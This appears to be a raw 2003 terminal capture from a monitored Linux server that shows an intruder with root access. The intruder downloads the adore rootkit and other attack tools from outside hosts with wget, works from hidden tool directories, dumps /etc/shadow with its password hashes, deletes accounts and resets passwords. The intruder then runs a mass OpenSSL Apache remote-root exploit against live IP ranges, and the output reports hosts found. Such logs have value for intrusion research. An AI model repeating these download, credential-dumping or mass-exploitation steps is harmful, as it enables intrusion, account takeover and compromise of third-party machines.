Wed Jun 4 00:11:12 HKT 2003
================================
Connected to ttyp1 snoop server...
Ctrl+'\' (ASCII 28) to suspend, Ctrl+'-' (ASCII 31) to terminate.
w
11:08pm up 8:03, 0 users, load average: 0.99, 0.96, 0.80
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
�]0;root@pc11: /root�[root@pc11 /root]# ps fax
PID TTY STAT TIME COMMAND
1 ? S 0:05 init [3]
2 ? SW 0:00 [keventd]
3 ? SW 0:00 [kapm-idled]
5 ? SW 0:00 [kreclaimd]
6 ? SW 0:00 [bdflush]
7 ? SW 0:00 [kupdated]
8 ? SW< 0:00 [mdrecoveryd]
175 ? S 0:00 write
179 ? S 0:00 java
2846 ? S 0:00 \_ java
2848 ? S 0:00 | \_ -tcsh
2875 ? S 0:00 | \_ /sbin/bash
2877 p0 S 0:00 | \_ /bin/bash
3114 ? S 0:00 \_ java
3116 ? S 0:00 \_ -tcsh
3143 ? S 0:00 \_ /sbin/bash
3145 p1 S 0:00 \_ /bin/bash
3212 p1 R 0:00 \_ ps fax
181 ? S 0:00 write
197 ? S 0:00 write
634 ? S 0:00 /usr/sbin/apmd -p 10 -w 5 -W -P /etc/sysconfig/apm-scri
691 ? S 0:00 /usr/sbin/automount --timeout 60 /misc file /etc/auto.m
717 ? S 0:00 /usr/sbin/atd
771 ? S 0:00 xinetd -reuse -pidfile /var/run/xinetd.pid
903 ? S 0:01 /usr/sbin/mysqld
2911 ? S 0:00 \_ /usr/sbin/mysqld
3179 ? S 0:00 \_ /usr/sbin/mysqld
926 ? S 0:00 write
928 1 S 0:00 /sbin/mingetty tty1
929 2 S 0:00 /sbin/mingetty tty2
930 3 S 0:00 /sbin/mingetty tty3
931 4 S 0:00 /sbin/mingetty tty4
935 5 S 0:00 /sbin/mingetty tty5
936 6 S 0:00 /sbin/mingetty tty6
975 ? S 0:00 mkdir tmp
2937 ? R 32:41 /bin/mingetty ttyp0
2938 ? S 0:00 /bin/number_cum -w 1 data1.dat 0010
3099 ? S 0:00 syslogd -m 0
3109 ? S 0:00 klogd -2
3205 ? R 0:01 /bin/mingetty ttyp1
3206 ? S 0:00 /bin/number_cum -w 1 data1.dat 0011
�]0;root@pc11: /root�[root@pc11 /root]# cd /usr/bin/.tux/tools
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# ./socklist
type port inode uid pid fd name
tcp 513 1303 0 771 7 xinetd
tcp 514 1302 0 771 6 xinetd
tcp 995 1304 0 771 8 xinetd
tcp 3306 1579 0 903 3 mysqld
tcp 143 1305 0 771 9 xinetd
tcp 465 1134 0 717 3 atd
tcp 10003 14 0 19 3 smbd
tcp 21 1299 0 771 3 xinetd
tcp 23 1301 0 771 5 xinetd
tcp 120 337 0 179 4 java
tcp 6010 12773 0 2911 3 mysqld
tcp 6011 14125 0 3179 3 mysqld
tcp 3306 12768 0 2911 4 mysqld
tcp 120 13997 0 3114 3 java
tcp 3306 14119 0 3179 4 mysqld
tcp 1037 12836 0 2938 5 number_cum
tcp 1041 14188 0 3206 5 number_cum
tcp 120 12646 0 2846 3 java
udp 514 13956 0 3099 7 syslogd
udp 69 1300 0 771 4 xinetd
udp 3049 2106 0 975 5 mkdir
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# wget snow.prohosting.com/~teamair/adore-0.52.tgz
--23:08:43-- http://snow.prohosting.com/%7Eteamair/adore-0.52.tgz
=> `adore-0.52.tgz.1'
Connecting to snow.prohosting.com:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 14,679 [application/x-tar]
0K -> .......... .... [100%]
23:08:43 (551.34 KB/s) - `adore-0.52.tgz.1' saved [14679/14679]
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# tar xzvf ado�re
tar (child): adore: Cannot read: Is a directory
tar (child): At beginning of tape, quitting now
tar (child): Error is not recoverable: exiting now
gzip: stdin: unexpected end of file
tar: Child returned status 2
tar: Error exit delayed from previous errors
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# tar xzvf ado�re
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# ls
�[01;34madore�[00m �[01;34mecmf�[00m �[01;34mscan�[00m �[01;34mssh�[00m
�[01;31madore-0.52.tgz�[00m �[01;34mexploits�[00m �[01;34msniffer�[00m �[01;34msynscan�[00m
�[00madore-0.52.tgz.1�[00m �[01;34mpsybnc�[00m �[01;32msocklist�[00m �[01;34mutils�[00m
�[01;34mbitchx�[00m �[01;31mpsymicutz.tgz�[00m �[01;31msocklist.tgz�[00m
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# rm -rf adore-0.52.tgz adore adore-0.52.tgz.1
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# ls
�[01;34mbitchx�[00m �[01;34mpsybnc�[00m �[01;34msniffer�[00m �[01;34mssh�[00m
�[01;34mecmf�[00m �[01;31mpsymicutz.tgz�[00m �[01;32msocklist�[00m �[01;34msynscan�[00m
�[01;34mexploits�[00m �[01;34mscan�[00m �[01;31msocklist.tgz�[00m �[01;34mutils�[00m
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# wget www.fracktal.us/Firewall.tgz
--23:09:10-- http://www.fracktal.us/Firewall.tgz
=> `Firewall.tgz'
Connecting to www.fracktal.us:80... connected!
HTTP request sent, awaiting response... 404 Not Found
23:09:18 ERROR 404: Not Found.
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# wget www.fracktal.us/F� �firewall.tgz
--23:09:31-- http://www.fracktal.us/firewall.tgz
=> `firewall.tgz'
Connecting to www.fracktal.us:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 809 [application/x-compressed]
0K -> [100%]
23:09:32 (790.04 KB/s) - `firewall.tgz' saved [809/809]
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# tar xzvf firewall.tgz
firewall/
firewall/start
firewall/stop
firewall/close
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# cd � �� �� ���./socklist
type port inode uid pid fd name
tcp 513 1303 0 771 7 xinetd
tcp 514 1302 0 771 6 xinetd
tcp 995 1304 0 771 8 xinetd
tcp 3306 1579 0 903 3 mysqld
tcp 143 1305 0 771 9 xinetd
tcp 465 1134 0 717 3 atd
tcp 10003 14 0 19 3 smbd
tcp 21 1299 0 771 3 xinetd
tcp 23 1301 0 771 5 xinetd
tcp 120 337 0 179 4 java
tcp 6010 12773 0 2911 3 mysqld
tcp 6011 14125 0 3179 3 mysqld
tcp 3306 12768 0 2911 4 mysqld
tcp 120 13997 0 3114 3 java
tcp 3306 14119 0 3179 4 mysqld
tcp 1037 12836 0 2938 5 number_cum
tcp 1041 14188 0 3206 5 number_cum
tcp 120 12646 0 2846 3 java
udp 514 13956 0 3099 7 syslogd
udp 69 1300 0 771 4 xinetd
udp 3049 2106 0 975 5 mkdir
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# cd fi�rewall
�]0;root@pc11: /usr/bin/.tux/tools/firewall�[root@pc11 firewall]# ./close 10003
Firewall rulez
Presented by Fracktal
Fracktal@fracktal.us
(C) 06-10-2002
Closing port 10003... done.
�]0;root@pc11: /usr/bin/.tux/tools/firewall�[root@pc11 firewall]# ./so�
bash: ./so: No such file or directory
�]0;root@pc11: /usr/bin/.tux/tools/firewall�[root@pc11 firewall]#
�]0;root@pc11: /usr/bin/.tux/tools/firewall�[root@pc11 firewall]# cd ..
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# ./socklist
type port inode uid pid fd name
tcp 513 1303 0 771 7 xinetd
tcp 514 1302 0 771 6 xinetd
tcp 995 1304 0 771 8 xinetd
tcp 3306 1579 0 903 3 mysqld
tcp 143 1305 0 771 9 xinetd
tcp 465 1134 0 717 3 atd
tcp 10003 14 0 19 3 smbd
tcp 21 1299 0 771 3 xinetd
tcp 23 1301 0 771 5 xinetd
tcp 120 337 0 179 4 java
tcp 6010 12773 0 2911 3 mysqld
tcp 6011 14125 0 3179 3 mysqld
tcp 3306 12768 0 2911 4 mysqld
tcp 120 13997 0 3114 3 java
tcp 3306 14119 0 3179 4 mysqld
tcp 1037 12836 0 2938 5 number_cum
tcp 1041 14188 0 3206 5 number_cum
tcp 120 12646 0 2846 3 java
udp 514 13956 0 3099 7 syslogd
udp 69 1300 0 771 4 xinetd
udp 3049 2106 0 975 5 mkdir
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# telnet locahlost 10003
locahlost: Unknown host
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# telnet locahlost 10003�����������h��[1Pl�[1@h
Trying 127.0.0.1...
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]#
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]#
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]#
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]#
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# killall -9 -vq smbd
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# killall -9 -vq smbd
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# ./socklist
type port inode uid pid fd name
tcp 513 1303 0 771 7 xinetd
tcp 514 1302 0 771 6 xinetd
tcp 995 1304 0 771 8 xinetd
tcp 3306 1579 0 903 3 mysqld
tcp 143 1305 0 771 9 xinetd
tcp 465 1134 0 717 3 atd
tcp 10003 14 0 19 3 smbd
tcp 21 1299 0 771 3 xinetd
tcp 23 1301 0 771 5 xinetd
tcp 120 337 0 179 4 java
tcp 6010 12773 0 2911 3 mysqld
tcp 6011 14125 0 3179 3 mysqld
tcp 3306 12768 0 2911 4 mysqld
tcp 120 13997 0 3114 3 java
tcp 3306 14119 0 3179 4 mysqld
tcp 1037 12836 0 2938 5 number_cum
tcp 1041 14188 0 3206 5 number_cum
tcp 120 12646 0 2846 3 java
udp 514 13956 0 3099 7 syslogd
udp 69 1300 0 771 4 xinetd
udp 3049 2106 0 975 5 mkdir
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# kill -9 19
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# ./socklist
type port inode uid pid fd name
tcp 513 1303 0 771 7 xinetd
tcp 514 1302 0 771 6 xinetd
tcp 995 1304 0 771 8 xinetd
tcp 3306 1579 0 903 3 mysqld
tcp 143 1305 0 771 9 xinetd
tcp 465 1134 0 717 3 atd
tcp 21 1299 0 771 3 xinetd
tcp 23 1301 0 771 5 xinetd
tcp 120 337 0 179 4 java
tcp 6010 12773 0 2911 3 mysqld
tcp 6011 14125 0 3179 3 mysqld
tcp 3306 12768 0 2911 4 mysqld
tcp 120 13997 0 3114 3 java
tcp 3306 14119 0 3179 4 mysqld
tcp 1037 12836 0 2938 5 number_cum
tcp 1041 14188 0 3206 5 number_cum
tcp 120 12646 0 2846 3 java
udp 514 13956 0 3099 7 syslogd
udp 69 1300 0 771 4 xinetd
udp 3049 2106 0 975 5 mkdir
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# cd fo� �i�rewall
�]0;root@pc11: /usr/bin/.tux/tools/firewall�[root@pc11 firewall]# ./close 6669
Firewall rulez
Presented by Fracktal
Fracktal@fracktal.us
(C) 06-10-2002
Closing port 6669... done.
�]0;root@pc11: /usr/bin/.tux/tools/firewall�[root@pc11 firewall]# cd ..
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# ls
�[01;34mbitchx�[00m �[01;34mfirewall�[00m �[01;31mpsymicutz.tgz�[00m �[01;32msocklist�[00m �[01;34msynscan�[00m
�[01;34mecmf�[00m �[01;31mfirewall.tgz�[00m �[01;34mscan�[00m �[01;31msocklist.tgz�[00m �[01;34mutils�[00m
�[01;34mexploits�[00m �[01;34mpsybnc�[00m �[01;34msniffer�[00m �[01;34mssh�[00m
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# ./socklist
type port inode uid pid fd name
tcp 513 1303 0 771 7 xinetd
tcp 514 1302 0 771 6 xinetd
tcp 995 1304 0 771 8 xinetd
tcp 3306 1579 0 903 3 mysqld
tcp 143 1305 0 771 9 xinetd
tcp 465 1134 0 717 3 atd
tcp 21 1299 0 771 3 xinetd
tcp 23 1301 0 771 5 xinetd
tcp 120 337 0 179 4 java
tcp 6010 12773 0 2911 3 mysqld
tcp 6011 14125 0 3179 3 mysqld
tcp 3306 12768 0 2911 4 mysqld
tcp 120 13997 0 3114 3 java
tcp 3306 14119 0 3179 4 mysqld
tcp 1037 12836 0 2938 5 number_cum
tcp 1041 14188 0 3206 5 number_cum
tcp 120 12646 0 2846 3 java
udp 514 13956 0 3099 7 syslogd
udp 69 1300 0 771 4 xinetd
udp 3049 2106 0 975 5 mkdir
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# telnet locahhost�������[1@~�[1@l���[1Pl��[1@~��[1Ph�[1P�host��� 1037
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# telnet localhost 1037� �� �� �� �1041
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# telnet localhost 1041� �� �� �� �3049
Trying 127.0.0.1...
telnet: Unable to connect to remote host: Connection refused
�]0;root@pc11: /usr/bin/.tux/tools�[root@pc11 tools]# telnet localhost 3049� �� �� �� �143
Trying 127.0.0.1...
Connected to localhost.localdomain (127.0.0.1).
Escape character is '^]'.
* OK [CAPABILITY IMAP4 IMAP4REV1 STARTTLS LOGIN-REFERRALS AUTH=LOGIN] localhost.localdomain IMAP4rev1 2000.283rh at Tue, 3 Jun 2003 23:11:49 +0800 (HKT)
BAD Missing command
BAD Missing command
BAD Missing command
BAD Missing command
^X
� BAD Missing command
Back at local tty.
end at Wed Jun 4 00:15:15 HKT 2003
----------------------------------
Wed Jun 4 00:15:26 HKT 2003
================================
Connected to ttyp1 snoop server...
Ctrl+'\' (ASCII 28) to suspend, Ctrl+'-' (ASCII 31) to terminate.
ps fax
PID TTY STAT TIME COMMAND
1 ? S 0:05 init [3]
2 ? SW 0:00 [keventd]
3 ? SW 0:00 [kapm-idled]
5 ? SW 0:00 [kreclaimd]
6 ? SW 0:00 [bdflush]
7 ? SW 0:00 [kupdated]
8 ? SW< 0:00 [mdrecoveryd]
175 ? S 0:00 write
179 ? S 0:00 java
2846 ? S 0:00 \_ java
2848 ? S 0:00 | \_ -tcsh
2875 ? S 0:00 | \_ /sbin/bash
2877 p0 S 0:00 | \_ /bin/bash
3297 ? S 0:00 \_ java
3299 ? S 0:00 \_ -tcsh
3326 ? S 0:00 \_ /sbin/bash
3328 p1 S 0:00 \_ /bin/bash
3393 p1 R 0:00 \_ ps fax
181 ? S 0:00 write
197 ? S 0:00 write
634 ? S 0:00 /usr/sbin/apmd -p 10 -w 5 -W -P /etc/sysconfig/apm-scri
691 ? S 0:00 /usr/sbin/automount --timeout 60 /misc file /etc/auto.m
717 ? S 0:00 /usr/sbin/atd
771 ? S 0:00 xinetd -reuse -pidfile /var/run/xinetd.pid
903 ? S 0:01 /usr/sbin/mysqld
2911 ? S 0:00 \_ /usr/sbin/mysqld
3362 ? S 0:00 \_ /usr/sbin/mysqld
926 ? S 0:00 write
928 1 S 0:00 /sbin/mingetty tty1
929 2 S 0:00 /sbin/mingetty tty2
930 3 S 0:00 /sbin/mingetty tty3
931 4 S 0:00 /sbin/mingetty tty4
935 5 S 0:00 /sbin/mingetty tty5
936 6 S 0:00 /sbin/mingetty tty6
975 ? S 0:00 mkdir tmp
2937 ? R 35:00 /bin/mingetty ttyp0
2938 ? S 0:00 /bin/number_cum -w 1 data1.dat 0010
3099 ? S 0:00 syslogd -m 0
3109 ? S 0:00 klogd -2
3388 ? R 0:09 /bin/mingetty ttyp1
3389 ? S 0:00 /bin/number_cum -w 1 data1.dat 0011
�]0;root@pc11: /root�[root@pc11 /root]# userf� �del nobody
userdel: user nobody does not exist
�]0;root@pc11: /root�[root@pc11 /root]# userdel nobody� �� �� �� �� �� �apche
userdel: user apche does not exist
�]0;root@pc11: /root�[root@pc11 /root]# w
11:16pm up 8:12, 0 users, load average: 1.83, 1.70, 1.23
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
�]0;root@pc11: /root�[root@pc11 /root]# cat /etc/shdaowe� �� �� �� �� �adow
root:$1$RN3vngbm$pIj/sf1ErXaJ2sd/iF2QW/:12095:0:99999:7:::
bin:*:12024:0:99999:7:::
daemon:*:12024:0:99999:7:::
adm:*:12024:0:99999:7:::
lp:*:12024:0:99999:7:::
sync:*:12024:0:99999:7:::
shutdown:*:12024:0:99999:7:::
halt:*:12024:0:99999:7:::
mail:*:12024:0:99999:7:::
news:*:12024:0:99999:7:::
uucp:*:12024:0:99999:7:::
operator:*:12024:0:99999:7:::
gopher:*:12024:0:99999:7:::
nscd:!!:12024:0:99999:7:::
mailnull:!!:12024:0:99999:7:::
ident:!!:12024:0:99999:7:::
rpc:!!:12024:0:99999:7:::
rpcuser:!!:12024:0:99999:7:::
xfs:!!:12024:0:99999:7:::
postgres:!!:12024:0:99999:7:::
named:!!:12024:0:99999:7:::
mysql:!!:12024:0:99999:7:::
ldap:!!:12024:0:99999:7:::
squid:!!:12024:0:99999:7:::
cheerie:$1$h7E/qOR6$tQcUpLZ25K7qfhroW7nBj0:12024:0:99999:7:::
games:x:12206:0:99999:7:::
noname:x:12206:0:99999:7:::
nasa:x:12206:0:99999:7:::
guest:$1$APWl79QE$Ors2NMpTJTVK4F5OW39pQ/:12206:0:99999:7:::
lol:x:12206:0:99999:7:::
ftp:!!:12206:0:99999:7:::
�]0;root@pc11: /root�[root@pc11 /root]# userdel ftp
�]0;root@pc11: /root�[root@pc11 /root]# userdel f� �lol
�]0;root@pc11: /root�[root@pc11 /root]# last
guest pts/1 gateway Tue Jun 3 22:14 still logged in
root pts/1 gateway Tue Jun 3 15:43 - 22:14 (06:31)
ftp ftpd1861 iesun21.ie.cuhk. Tue Jun 3 15:41 - 15:41 (00:00)
root pts/1 gateway Tue Jun 3 15:39 - 15:43 (00:04)
ftp ftpd1646 localhost.locald Tue Jun 3 15:38 - 15:38 (00:00)
root pts/1 gateway Tue Jun 3 15:31 - 15:39 (00:07)
root pts/1 gateway Tue Jun 3 15:24 - 15:31 (00:07)
root pts/1 gateway Tue Jun 3 15:22 - 15:24 (00:01)
root pts/0 gateway Tue Jun 3 15:08 still logged in
reboot system boot 2.4.2-2 Tue Jun 3 15:04 (08:12)
root tty1 Tue Jun 3 15:02 - down (00:00)
root pts/0 gateway Tue Jun 3 15:01 - down (00:02)
reboot system boot 2.4.2-2 Tue Jun 3 14:54 (00:09)
reboot system boot 2.4.2-2 Tue Jun 3 14:52 (00:11)
reboot system boot 2.4.2-2 Tue Jun 3 14:49 (00:14)
wtmp begins Tue Jun 3 14:49:12 2003
�]0;root@pc11: /root�[root@pc11 /root]# passwd guest
Changing password for user guest
New UNIX password:
BAD PASSWORD: it is too short
Retype new UNIX password:
passwd: all authentication tokens updated successfully
�]0;root@pc11: /root�[root@pc11 /root]# passwd cheerie
Changing password for user cheerie
New UNIX password:
BAD PASSWORD: it is too short
Retype new UNIX password:
Sorry, passwords do not match
New UNIX password:
BAD PASSWORD: it is too short
Retype new UNIX password:
passwd: all authentication tokens updated successfully
�]0;root@pc11: /root�[root@pc11 /root]# cd /etc/nmh/...
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# ls
�[01;34mcuratare�[00m �[01;32mread�[00m �[00mtcp.log�[00m �[01;32mwrite�[00m
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# ./read tcp.log
Tue Jun 3 23:18:56 HKT 2003
-rw-rw-rw- 1 root root 796 Jun 3 23:11 tcp.log
----------------------------------------------------------------------
----------------------------------------------------------------------
Tue Jun 3 23:18:57 HKT 2003
-------------------------------------------------------------------EOF
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# wget giovannegio.us/ussla.tgz
--23:19:08-- http://giovannegio.us/ussla.tgz
=> `ussla.tgz'
Connecting to giovannegio.us:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 66,813 [application/x-compressed]
0K -> .......... .......... .......... .......... .......... [ 76%]
50K -> .......... ..... [100%]
23:19:14 (21.75 KB/s) - `ussla.tgz' saved [66813/66813]
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# tar xzvf ussla.tgz
ussl/
ussl/main.c
ussl/main.h
ussl/ssl2.c
ussl/ssl2.h
ussl/linux-x86.c
ussl/Makefile
ussl/a
ussl/mass.c
ussl/mass
ussl/ussl
ussl/scan.log
�]0;root@pc11: /etc/nmh/...�[root@pc11 ...]# cd us�sl
�]0;root@pc11: /etc/nmh/.../ussl�[root@pc11 ussl]# ./mass 211.20.0.0
: OpenSSL apache exploit by Solar Eclipse
: Mass scanner & httpd version grabber by Phill
Scanning from 211.20.0.0, port 443, timeout 3s, sockets 100
Press Ctrl+C or Ctrl+Z to stop. Enjoy the ride.
Scanning 211.20.0.100... (found: 0) (time: 00:00:00) �������
Trying to own 211.20.0.86 ...
*** openssl-too-open : OpenSSL remote exploit
*** enhanced by Druid -- no more damn offsets ;) ***
*** just instant root... h3h3 :>>
*** Greetz: vMaTriCs
: Opening 30 connections
Connection failed: Connection refused
Scanning 211.20.0.207... (found: 1) (time: 00:00:07) �������
Trying to own 211.20.0.186 ...
*** openssl-too-open : OpenSSL remote exploit
*** enhanced by Druid -- no more damn offsets ;) ***
*** just instant root... h3h3 :>>
*** Greetz: vMaTriCs
: Opening 30 connections
Connection failed: Connection refused
Scanning 211.20.1.62... (found: 2) (time: 00:00:12) �������
Trying to own 211.20.1.21 ...
*** openssl-too-open : OpenSSL remote exploit
*** enhanced by Druid -- no more damn offsets ;) ***
*** just instant root... h3h3 :>>
*** Greetz: vMaTriCs
: Opening 30 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
Freeing resources... done. Found 3 ips.
�]0;root@pc11: /etc/nmh/.../ussl�[root@pc11 ussl]#
�]0;root@pc11: /etc/nmh/.../ussl�[root@pc11 ussl]#
�]0;root@pc11: /etc/nmh/.../ussl�[root@pc11 ussl]#
�]0;root@pc11: /etc/nmh/.../ussl�[root@pc11 ussl]#
�]0;root@pc11: /etc/nmh/.../ussl�[root@pc11 ussl]# ./mass 211.20.0.0�����0.�[1@1���[1@0��[1P�[1@\��[1P��[1P�[1@3�[1@0������[1P���[1P��[1@~�[1@4�[1@3
Bad mask specified. See `./mass --help` for examples.
�]0;root@pc11: /etc/nmh/.../ussl�[root@pc11 ussl]# ./mass 431.230.10.0�����������[1P�����[1P�[1@ ~��[1P
: OpenSSL apache exploit by Solar Eclipse
: Mass scanner & httpd version grabber by Phill
Scanning from 43.230.10.0, port 443, timeout 3s, sockets 100
Press Ctrl+C or Ctrl+Z to stop. Enjoy the ride.